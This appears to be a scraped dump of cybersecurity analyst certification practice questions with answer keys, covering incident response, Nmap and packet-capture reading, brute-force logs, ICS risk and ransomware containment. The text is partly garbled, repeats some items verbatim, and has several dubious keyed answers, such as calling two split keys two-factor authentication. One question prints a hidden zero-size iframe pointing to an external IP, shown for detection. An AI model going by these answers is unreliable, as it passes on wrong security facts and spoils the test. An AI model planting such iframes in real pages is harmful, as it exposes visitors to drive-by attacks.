- ** Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate?
a. ICS/SCADA systems are not supported by the CVE publications.
b. ICS/SCADA system rarely have full security functionality.
c. ICS/SCADA systems do not allow remote connections.
d. ICS/SCADA systems use encrypted traffic to communicate between devices.
b. ICS/SCADA system rarely have full security functionality.
- ** Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate?
a. ICS/SCADA systems are not supported by the CVE publications.
b. ICS/SCADA system rarely have full security functionality.
c. ICS/SCADA systems do not allow remote connections.
d. ICS/SCADA systems use encrypted traffic to communicate between devices.
b. ICS/SCADA system rarely have full security functionality.
- ** Which of the following BEST describes why vulnerabilities found in ICS and SCADA can be difficult to remediate?
a. ICS/SCADA systems are not supported by the CVE publications.
b. ICS/SCADA system rarely have full security functionality.
c. ICS/SCADA systems do not allow remote connections.
d. ICS/SCADA systems use encrypted traffic to communicate between devices.
b. ICS/SCADA system rarely have full security functionality.
- ** In the development stage of the incident response policy, the security analyst needs to determine the stakeholders for the policy. Which of the following would be the policy stakeholders?
a. Human resources, legal, public relations, management
b. Chief Information Officer (CIO), Chief Executive Officer (CEO), the board of directors, stockholders
c. IT, human resources, security administrator, finance
d. Public information officer, human resources, audit, customer service
b. Chief Information Officer (CIO), Chief Executive Officer (CEO), the board of directors, stockholders
- ** After reviewing security logs, it is noticed that sensitive data is being transferred over an insecure network. Which of the following would a cybersecurity analyst BEST recommend that the organization implement?
a. Use a VPN.
b. Update the data classification matrix.
c. Segment the networks.
d. Use a FIM.
e. Use a digital watermark.
a. Use a VPN.
- ** The help desk informed a security a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files:
Locky.js
xerty.ini
xerty.lib
Further analyst indicates that when the .zip file is opened; it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices?
a. Disable access to the company VPN
b. Move the files from the NAS to a cloud-based strong solution
c. Set permissions on file shares to read-only
d. Add the URL included in the .js file to the company’s web proxy filter
d. Add the URL included in the .js file to the company’s web proxy filter
- ** A Chief Information Security Officer (CISO) needs to ensure that a laptop image remains unchanged and can be verified before authorizing the deployment of the image to 4000 laptops. Which of the following tools would appropriate to use in this case?
a. MSBA
b. SHA1sum
c. FIM
d. DLP
c. FIM
- ** As part of its SDLC, an organization scans all new applications for the OWASP Top 10 vulnerabilities. A new application shows no vulnerabilities via this process and is placed into production. An independent penetration test identifies several network layer vulnerabilities. Which of the following is the MOST likely cause?
a. The vulnerability scanner should have utilized a credentialed scan.
b. The OWASP Top does not include methods to detect this class of vulnerability.
c. The scanner cannot see the traffic used by the application because it is configured to use SSL/TLS.
d. The application is not subject to PCI, so it doesn’t need to be scanned at the network Layer.
b. The OWASP Top does not include methods to detect this class of vulnerability.
- ** An organization suspects it has had a breach, and it is trying to determine the potential impact. The organization knows the following:
- The source of the breach is linked to an IP located in a foreign country.
- The breach is isolated to the research and development servers.
- The hash values of the data before and after the breach are unchanged.
- The affected servers were regularly patched, and a recent scan showed no vulnerabilities.
Which of the following conclusions can be drawn with respect to the threat and impact? (Select TWO)
a. The confidentiality of the data is unaffected.
b. The threat is an APT.
c. The source IP of the threat has been spoofed.
d. The integrity of the data is unaffected.
e. The threat is an insider.
b. The threat is an APT.
d. The integrity of the data is unaffected.
- ** A security analyst is monitoring authentication exchanges over the company’s wireless network. A sample of the Wireshark output is shown below:
No Time Source Destination Protocol Info
1345 191.12345 Cisco_91:aa Netgear_a5:ef EAP Request, Identify
1350 191.12456 Netgear_a5:ef Cisco_91:aa EAP Response, Identify
1355 191.12678 Cisco_91:aa Netgear_a5:ef EAP Request, LEAP
1360 191.12890 Netgear_a5:ef Cisco_91:aa TLSv1.1 Client Hello
….
2145 193.12345 fooHost barServer TCP GET ./login.jsp
2150 193.12456 barServer TCP TCP Source port:80
…
Which of the following would improve the security posture of the wireless network?
a. Using PEAP instead of LEAP
b. Using SSL 2.0 instead of TLSv1.1
c. Using .aspx instead of.jsp
d. Using UDP instead of TCP
a. Using PEAP instead of LEAP
- ** In reviewing service desk requests, management has requested that the security analyst investigate the requests submitted by the new human resources manager. The requests consist of “unlocking” files that belonged to the previous human resources manager. The security analyst has uncovered a tool that is used to display file-level passwords. This tool is being used by several members of the service desk to unlock files. The content of these files is highly sensitive information pertaining to personnel. Which of the following BEST describes this scenario? (Select TWO)
a. Unauthorized data exfiltration
b. Unauthorized data masking
c. Unauthorized access
d. Unauthorized software
e. Unauthorized controls
c. Unauthorized access
d. Unauthorized software
- ** A user received an invalid password response when trying to change the password. Which of the following policies could explain why the password is invalid?
a. Access control policy
b. Account management policy
c. Password policy
d. Data ownership
c. Password policy
- ** Nmap done: 1 IP address ( 1host up) scanned in 0.822 seconds
Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:34 EDT
Interesting ports on host adminServer (192.168.1.1.15):
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
3306/tcp open mysql
Service detection performed.
Nmap done: 1 IP address (1 host up) scanned in 0.822 seconds
Starting Nmap 4.11 (http://nmap.org) at 2011-11-03 18:35 EDT
Interesting ports on host opsServer (192.168.1.16):
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
1417/tcp open OpenSSh
Service detection performed.
Nmap done: 1IP address (1 host up) scanned in 0.822 seconds
Which of the following servers is out of compliance?
a. finServer
b. adminServer
c. orgServer
d. opsServer
d. opsServer
- An analyst is conducting a log review and identifies the following snippet in one of the logs:
Jun 10 07:09:10 databse1 sshd [24665] : Invalid user root from 101.79.130.213
Jun 10 07:36:03 databse1 sshd [24901] : Invalid user root from 101.79.130.213
Jun 10 07:42:44 databse1 sshd [24938] : Invalid user root from 101.79.130.213
Jun 10 07:56:11 databse1 sshd [26570] : Invalid user root from 101.79.130.213
Jun 10 08:02:55 databse1 sshd [30144] : Invalid user root from 101.79.130.213
Which of the following MOST likely caused this activity?
a. SQL injection
b. Privilege escalation
c. Forgotten Password
d. Brute force
d. Brute force
- ** An organization has a practice of running some administrative services on non-standard ports as a way of frustrating any attempts at reconnaissance. The output of the latest scan on host 192.168.1.13 is shown below:
Starting Nmap 4.67 (http://nmap.org) at 2011-11-03 18:32 EDT
Nmap scan report for 192.168.1.13
Host is up (0.00066s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
23/tcp open ssh
111/tcp open rpcbind
139/tcp open netbios-ssn
1417/tcp open OpenSSH
3306/tcp open mysql
MAC Address : 01:AA:FB:23:21:45
Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
Which of the following statements is true?
a. Running SSH on the Telnet Port will now be sent across an unencrypted port.
b. Despite the result of the scan, the service running on port 23 is actually telnet and not SSH, and creates an additional vulnerability.
c. Running SSH on port 23 provides little additional security from running it on the standard port.
d. Remote SSH connections will automatically default to the standard SSH port.
e. The use of OpenSSH on its default secure port will supersede any other remote connection attempts.
c. Running SSH on port 23 provides little additional security from running it on the standard port.
82. ** A cybersecurity analyst is currently checking a newly deployed server that has an access control list applied. When conducting the scan, the analyst received the following code snippet of results: Mail Server1 Trying 192.168.2.2 Connected Get/HTTP/1.0 HTTP: 1.0 200 Document follows Server: server/0.10 Connection: close Set-cookie: testing=1; path=/ Which of the following describes the output of the scan?
a. The analyst has discovered a false Positive, and the status code is incorrect providing an OK message.
b. The analyst has discovered a True Positive, and the status code is correct providing a file not found error message.
c. The analyst has discovered a True Positive, and the status code is incorrect providing a forbidden message.
d. The analyst has discovered a False Positive, and the status code is incorrect providing a server error message.
d. The analyst has discovered a False Positive, and the status code is incorrect providing a server error message.
- Employees at a manufacturing plant have been victims of spear phishing, but security solutions prevented further intrusions into the network. Which of the following is the MOST appropriate solution in this scenario?
a. Continue to monitor security devices.
b. Update antivirus and malware definitions.
c. Provide security awareness training.
d. Migrate email services to a hosted environment.
c. Provide security awareness training.
- A security analyst received an email with the following key:
Xj3XJ3LLc
A second security analyst received an email with the following key:
3XJ3xjcLLC
The security manager has informed the two analysts that the email they received is a key that allows access to the company’s financial segment for maintenance. This is an example:
a. dual control
b. private key encryption
c. separation of duties
d. public key encryption
e. two-factor authentication
e. two-factor authentication
- *! A cybersecurity was asked to review several results of web vulnerability scan logs.
Given the following snippet of code:
Iframe src=”http//65.240.22.1” width=”0” height=”0” frmeborder=”0” tabindex=”-1” title=”empty”
style=visibility:hidden; display:none/iframe
Which of the following BEST describes the situation and recommendations to be made?
a. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The code should include the domain name. Recommend the entry be updated with the domain name.
b. The security analyst has discovered an embedded iframe that is hidden from the user accessing the web page. This code is correct. This is a design preference, and no vulnerabilities are present.
c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious. Recommend the entry be removed from the web page.
d. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. Recommend making the iframe visible. Fixing the code will correct the issue.
c. The security analyst has discovered an embedded iframe pointing to source IP 65.240.22.1 network. The link is hidden and suspicious.
- ** A security analyst positively identified the threat, vulnerability, and remediation. The analyst is ready to implement the corrective control. Which of the following would be the MOST inhibiting to applying the fix?
a. Requiring a firewall reboot
b. Resetting all administrator password
c. Business process interruption
d. Full desktop backups
c. Business process interruption
- ** The board of directors made the decision to adopt a cloud-first strategy. The current security infrastructure was designed for on-premises implementation. A critical application that is subject to the Federal Information Security Management Act (FISMA) of 2002 compliance has been identified as a candidate for a hybrid cloud deployment model. Which of the following should be conducted FIRST?
a. Develop a request for proposal
b. Perform a risk assessment
c. Review current security controls
d. Review the SLA for FISMA compliance
b. Perform a risk assessment
- The development team recently moved to a new application into production for the accounting department. After this occurred, the chief information officer (CIO) was contacted by the head of accounting because the application is missing a key piece of functionality that is needed to complete the corporation’s quarterly tax returns. Which of the following types of testing would help prevent this from reoccurring?
a. Security regression testing
b. User acceptance testing
c. Input validation testing
d. static code testing
b. User acceptance testing
- A human resources employee sends out a mass email to all employees that contain their personnel records. A security analyst is called in to address the concern of the human resources director on how to prevent this from happening in the future. Which of the following would be the BEST solution to recommend to the director?
a. Install a data loss prevention system, and train human resources employees on its use.
b. Provide Pll training to all employees at the company. Encrypt Pll information.
c. Enforce encryption on all emails sent within the company. Create a Pll program and policy on how to handle data Train all human resources employees.
d. Train all employees. Encrypt data sent on the company network. Bring in privacy personnel to present a plan on how Pll should be handled.
e. Install specific equipment to create a human resources policy that protects Pll data. Train company employees on how to handle Pll data. Outsource all Pll to another company. Send the human resources director to be training for Pll handling.
b. Provide Pll training to all employees at the company. Encrypt Pll information.
- ** A software engineer has resigned and given two weeks’ notice. The organization is concerned the engineer may have taken proprietary code. Which of the following will BEST help the security analysts to determine if any code has been exfiltrated?
a. Terminate and immediately escort the engineer out of the building.
b. Develop a timeline of the engineer’s system and network activity.
c. Investigate when projects were checked out of the code repository by the engineer.
d. Dump the contents of RAM from the engineer’s workstation and review.
b. Develop a timeline of the engineer’s system and network activity.
- During an investigation, an incident responder intends to recover multiple pieces of digital media. Before removing the media, the responder should initiate:
a. malware scans
b. secure communication
c. chain of custody forms
d. decryption tools
c. chain of custody forms
- ** A security analyst receives a mobile device with symptoms of a virus infection. The virus is morphing whenever it is moved from sandbox to sandbox to analyze. Which of the following will help to identify the number of variations through the analysis life cycle?
a. Journaling
b. Hashing utilities
c. Log viewers
d. OS and process analysis
e. IOC tagging
e. IOC tagging
- A company wants to replace its existing security infrastructure, including the firewall, IPS, and vulnerability scanner. A demo scanner from the new vendor is deployed. The analyst scans a device with the demo and legacy scanners and compares the results:
Vulnerability Legacy Scanner Demo Scanner
Chrome <44.3.1532.34 X
Chrome <43.7.9786.72 X
Adobe Reader < 10 X
Microsoft SMB Remote Code
Execution
X X
Apache < 2.4 X X
Which of the following is MOST likely responsible for the discrepancy in results?
a. The demo scanner needs to be configured to run a credentialed scan.
b. The demo scanner needs to be configured as an exception in the IPS.
c. The demo scanner is cloud-based and cannot identify local vulnerabilities.
d. The legacy scanner is producing false positives and should be replaced.
a. The demo scanner needs to be configured to run a credentialed scan.
- An analyst was investigating an attack that place on the network. A user was able to access the system without proper authentication. Which of the following will the analyst recommend, related to management approaches, in order to control access? (Select THREE)
a. RBAC
b. LEAP
c. DAC
d. PEAP
e. MAC
f. SCAP
g. BCP
A. RBAC
C. DAC
E. MAC
- The security team for a large, international organization is developing a vulnerability management program. The development staff has expressed concern that the new program will cause service interruptions and downtime as vulnerabilities are remedied. Which of the following should the Security team implement FIRST as a component of the remediation process to address this concern?
a. Automated patch management
b. Change control procedures
c. Security regression testing
d. Isolation of vulnerable servers
c. Security regression testing
- ** A worm was detected on multiple PCs within a remote office. The security analyst recommended that the remote office be blocked from the corporate network during the incident response. Which of the following processes BEST describes this recommendation?
a. Logical isolation of the remote office
b. Sanitization of the network environment
c. Segmentation of the network
d. Secure disposal of affected systems
c. Segmentation of the network
:)
:)
- A Cybersecurity analyst is capturing an image of a machine that is possibly infected with web malware. During which of the following incident response phases does that occur?
a. Eradication
b. Analysis
c. Recovery
d. Post-incident
b. Analysis
- ** An organization has a policy prohibiting remote administration of servers where web services are running. One of the Nmap scans is shown here:
Starting Nmap 4.67 (http://map.org) at 2011-11-03 18:32 EDT
Nmap scan report for 192.168.1.13
Host is up (0.00066s latency).
/>Not shown: 992 closed ports
PORT STATESERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
3306 open mysql
MAC Address:01:AA:FB:23:21:45
Nmap done: 1 IP address (1 host up) scanned in 4.22 seconds
Given the organization’s policy, which is the following services should be disabled on this server?
a. rpcbind
b. netbios-ssn
c. mysql
d. ssh
e. talent
d. ssh
- ** A threat intelligence analyst who works for an oil and gas company has received the following email from a superior.
“We will be connecting our IT network with our ICS. Our IT security has historically been top of the line and this convergence will make the ICS easier to manage and troubleshoot. Can you please perform a risk/vulnerability assessment of this decision?”
Which of the following is MOST accurate regarding ICS in this scenario?
a. Convergence decrease attack vectors.
b. Integration increases the attack surface.
c. IT networks cannot be connected to ICS infrastructure.
d. Combined networks decrease efficiency.
b. Integration increases the attack surface.
- A security analyst found a packet analysis tool developed by the DHS that is available without registration on file-share sites. Many reputable security sites recommend the tool. However, the DHS site needs to be registered in order to get the download link with integrity verification. Which of the following describes the method the analyst would use the ensure the tool that is downloaded from the file share is an exact copy of the tool DHS is providing?
a. Hashing
b. Encryption
c. Source authentication
d. Isolation
a. Hashing
- A systems administrator is doing network reconnaissance of a company’s external network to determine the vulnerability of various services that are running. Sending some sample traffic to the external host, the administrator obtains the following packet capture:
18 17.646496 67.53.200.1 67.53.20.12 TCP 58 47669 -> 22 [SYN] Seq=0 Win=1024 Len=0
MSS=1460
19 17.646944 67.53.200.1 67.53.200.12 TCP 58 47669 -> 445 [SYN] Seq=0 Win=1024
Len=0 MSS=1460
20 17.648631 67.53.200.12 67.53.200.1 TCP 58 22 -> 47669 [SYN, ACK] Seq=0 Ack=1
Win=5840 Len=0 MSS=1460
21 17.648646 67.53.200.1 67.53.200.12 TCP 58 47669 -> 80 [SYN] Seq=0 Win=1024 Len=0
MSS=1460
22 17.648887 67.53.200.12 67.53.200.1 TCP 54 445 -> 47669 [RST, ACK] Seq=1 Ack=1 Win=0
Len=0
23 17.649763 67.53.200.12 67.53.200.1 TCP 54 80 -> 47669 [RST, ACK] Seq=1 Ack Win=0
Len=0
Based on the output, which of the following services should be further tested for vulnerabilities?
a. SSH
b. HTTP
c. SMB
d. HTTPS
c. SMB
- ** A company is concerned about attacks in which an attacker impersonates a user by extracting password hashes. A security analyst has been tasked with mitigating this potential threat. Which of the following security controls would BEST mitigate this issue?
a. Salting the password hashes
b. Increasing bit length of the hashing algorithm
c. Multifactor authentication via smart cards
d. Policy requiring 15-character password
a. Salting the password hashes
- An analyst has informed the Chief Executive Officer (CEO) of a company that a security breach has occurred. The risk manager was unaware and caught off-guard when the CEO asked for further information. Which of the following should be implemented to ensure the risk manager is knowledgeable of any future breaches?
a. Incident management
b. Lessons learned report
c. Chain of custody management
d. Change control process
a. Incident management
- ** As part of its SDLC, an organization scans all new applications for the OWASP Top 10 vulnerabilities. A new application shows no vulnerabilities via this process and is placed into production. An independent penetration test identifies several network layer vulnerabilities. Which of the following is the MOST likely cause?
a. The vulnerability scanner should have utilized a credentialed scan.
b. The OWASP Top 10 does not include methods to detect this class of vulnerability.
c. The scanner cannot see the traffic used by the application because it is configured to use SSL/TLS.
d. The application is not subject to PCI, so it doesn’t need to be scanned at the network layer
b. The OWASP Top 10 does not include methods to detect this class of vulnerability.
- Management wants to scan servers for vulnerabilities on a periodic basis. Management has decided that the scan frequency should be determined only by vendor patch schedules and the organization’s application deployment schedule. Which of the following would force the organization to conduct an out-of-cycle vulnerability scan?
a. Newly discovered PII on a server
b. A vendor releases a critical patch update
c. A critical resource utilization in the organization’s application
d. False positives identified in production
b. A vendor releases a critical patch update
- An alert is issued from the SIEM that indicates a large number of failed logins for the same account name on one of the application servers starting at 10:20 a.m. No other significant failed login activity is detected. Using Splunk to search for activity pertaining to that account name, a security analyst finds the account has been authenticating successfully for some time and started to fail this morning. The account is attempting to authenticate from an internal server that is running a database to an application server. No other security activity is detected on the network. The analyst discovers the account owner is a developer who no longer works for the company. Which of the following is the MOST likely reason for the failed login attempts for that account?
a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.
b. The host-based firewall is blocking port 389 LDAP communication, preventing the login credentials from being received by the application server.
c. The license for the application has expired, and the failed login will continue to occur until a new license key is installed on the application.
d. A successful malware attack has provided someone access to the network, and failed login attempt to privilege access to the application.
a. The account that is failing to authenticate has not been maintained, and the company password change policy time frame has been reached for that account.
- A cybersecurity analyst is reviewing the results of a recent external vulnerability scan. Several DDoS vulnerabilities are identified for devices, including a GroupWise mail server and several wireless access points that have critical, high vulnerabilities. None of these devices are listed on the network or software inventory. Which of the following should the analyst perform NEXT?
a. Notify accounting of errors on the hardware and software inventories.
b. Check the firewall logs for suspicious activity.
c. Request a new scan with a different tool and compare the findings.
d. Block the GroupWise mail server at the firewall.
a. Notify accounting of errors on the hardware and software inventories.
- ** A security analyst at a large financial institution is evaluating the security posture of a smaller financial company. The analyst is performing the evaluation as part of a due diligence process to a potential acquisition. With which of the following threats should the security analyst be MOST concerned? (Select TWO).
a. Breach of confidentiality and market risk can occur if the potential acquisition is leaked to the press.
b. The parent company is only going through this process to identify and steal the intellectual property of the smaller company.
c. The company being acquired has its own tools and process and will be resistant to integrating with the parent company.
d. Employees at the company being acquired will be hostile to the security analyst and may not provide honest answers.
e. The industry may decide that the acquisition will result in unfair competitive advantage if the acquisition were to take place.
f. The company being acquired may already be compromised, and this could pose a risk to the parent company’s assets.
a. Breach of confidentiality and market risk can occur if the potential acquisition is leaked to the press.
f. The company being acquired may already be compromised, and this could pose a risk to the parent company’s assets.
- ** After a recent security breach, it was discovered that a developer had promoted code that had been written to the production environment as a hotfix to resolve a user navigation issue that was causing issues for several customers. The code had inadvertently granted administrative privileges to all users, allowing inappropriate access to sensitive data and reports. Which of the following could have prevented this code from being released into the production environment?
a. Cross training
b. Succession planning
c. Automated reporting
d. Separation of duties
d. Separation of duties
- A staff member reported that a laptop has degraded performance. The security analyst has investigated the issue and discovered that CPU utilization, memory utilization, and outbound network traffic are consuming the laptop’s resources. Which of the following is the BEST course of action to resolve the problem?
a. Identify and remove malicious processes.
b. Disable scheduled tasks.
c. Suspend virus scan.
d. Increase laptop memory.
e. Ensure the laptop OS is properly patched.
a. Identify and remove malicious processes.
- Which of the following system or services is MOST likely to exhibit issues stemming from the Heartbleed vulnerability? (Select TWO).
a. SSH daemons
b. Web servers
c. Modbus devices
d. TLS VPN services
e. IPSec VPN concentrators
b. Web servers
d. TLS VPN services
- Which of the following organizations would have to remediate immediately embedded controller vulnerabilities?
a. Banking institutions
b. Public universities
c. Regulatory agencies
d. Hydroelectric facilities
d. Hydroelectric facilities
- A security analyst is conducting traffic analysis following a potential web server breach. The analyst wants to investigate client-side server errors.
Time IP Protocol Status Code
11:42 10.34.3.5 HTTP 500
11:39 85.13.7.6 HTTP 200
11:15 72.33.8.2 HTTP 401
11:01 33.88.9.6 HTTP 102
Which of the following lines of this query output should be investigated?
a. 1
b. 2
c. 3
d. 4
a. 1
- Ransomware is identified on a company’s network that affects both Windows and MAC hosts. The command and control channel for encryption for this uses TCP ports from 11000 to 65000. The channel goes1. Lholdbadkeys.com, which resolves to IP address 172.172.16.2. Which of the following is the MOST effective way to prevent any newly infected system from actually encrypting the data on connected-network drives while Causing the least disruption to normal internet traffic?
a. Block all outbound traffic to web host good1 iholdbadkeys.com at the border gateway.
b. Block all outbound TCP connections to IP host address 172.172.16.2 at the border gateway.
c. Block all outbound traffic on TCP ports 11000 to 65000 at the border gateway.
d. Block all outbound traffic on TCP ports 11000 to 65000 to IP host address 172.172.15.2 at the border gateway.
a. Block all outbound traffic to web host good1 iholdbadkeys.com at the border gateway.